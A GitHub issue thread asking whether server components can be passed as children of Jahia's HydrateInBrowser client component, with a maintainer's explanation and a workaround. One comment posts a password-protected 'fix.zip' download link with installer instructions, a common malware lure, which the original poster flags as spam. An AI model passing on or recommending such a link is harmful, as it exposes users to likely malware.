### ISSUE TITLE
Possibility to embed Server Components as Children of the Client Child of HydratedInBrower ?

### ISSUE THREAD

**Issue by achaabni** [Jahia/npm-modules-engine#179]
> Fix version:

## Functional requirement
This is not an issue but more a question.
**As a** Developer

**I want to** know if there is a possibility to send Server Components as **children** of the **HydratedInBrowser** Client Component
https://academy.jahia.com/documentation/jahia/jahia-8/developer/javascript-module-development/client-side-javascript

Like if I could have 
```
<HydrateInBrowser child={SampleHydrateInBrowserReact} props={{initialValue: 9}}>
    <ServerComponent1></ServerComponent1>
    <ServerComponent2></ServerComponent2>
    <ServerComponent3></ServerComponent3/>
</HydrateInBrowser> 
```
and pass them as children of SampleHydrateInBrowserReact

I tried to pass them as props but it didn't work.

**In order to** render them as server components
Here is a React use case similarity (**Putting all server components as children of ThemeProvider which is a client component**)
https://www.youtube.com/watch?v=9YuHTGAAyu0

Thank you in advance.

## Acceptance criteria

**Given**

**When**

**Then**

## Non-functional requirements
- Security
  - Identity management
  - Authentication
  - Authorization
  - Session management
  - Data validation
  - Error handling
- Performances
- Migration
- Documentation

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by achaabni** [comment]
I don't know the commenter above, it seems like a spammer.

**Comment by jkevan** [comment]
Hi @achaabni,

Thank you for trying Jahia JS modules and for your question!

It is possible to use components on both the server and client side, which is what HydrateInBrowser does. However, for this to work, you need to declare the components directly within the hydrated root component. In the example you mentioned:

```
<HydrateInBrowser child={SampleHydrateInBrowserReact} props={{ initialValue: 9 }}>
    <ServerComponent1 />
    <ServerComponent2 />
    <ServerComponent3 />
</HydrateInBrowser> 
```

You could modify it as follows:

`<HydrateInBrowser child={SampleHydrateInBrowserReact} props={{ initialValue: 9 }} />`

Then, inside your SampleHydrateInBrowserReact component, declare:

```
<ServerComponent1 />
<ServerComponent2 />
<ServerComponent3 />
```

However, this means that the children components would no longer be configurable, which may have been the point of your question. Currently, we do not support passing children as props when it comes to hydration. That's also why the root component is declared the way it is currently declared, we need to do some resolution of component name and custom logic to wire components correctly between client/server, but I agree in a perfect world it would have been amazing to be able to write directly:

```
<HydrateInBrowser>
     <SampleHydrateInBrowserReact initialValue={9}>
</>
```
But it's not possible in current implementation, for now.

Hope I have been able to answer your question, and help you.
Best regards,
Kevan

**Comment by achaabni** [comment]
Hi @jkevan 
Thank you for your answer, I did find some workaround by sending all needed data (for children) as props to the hydrated component.

The way I wanted is to have a generic hydrated (typically a carousel) that can have one child, others 2 children, and others more different subChildren and based on the children we can have different behavior. This way I let the client side just do the scrolling while I give it an already rendered (or prerendered components sent from the server)

Thanks again for your answer

Kind regards,
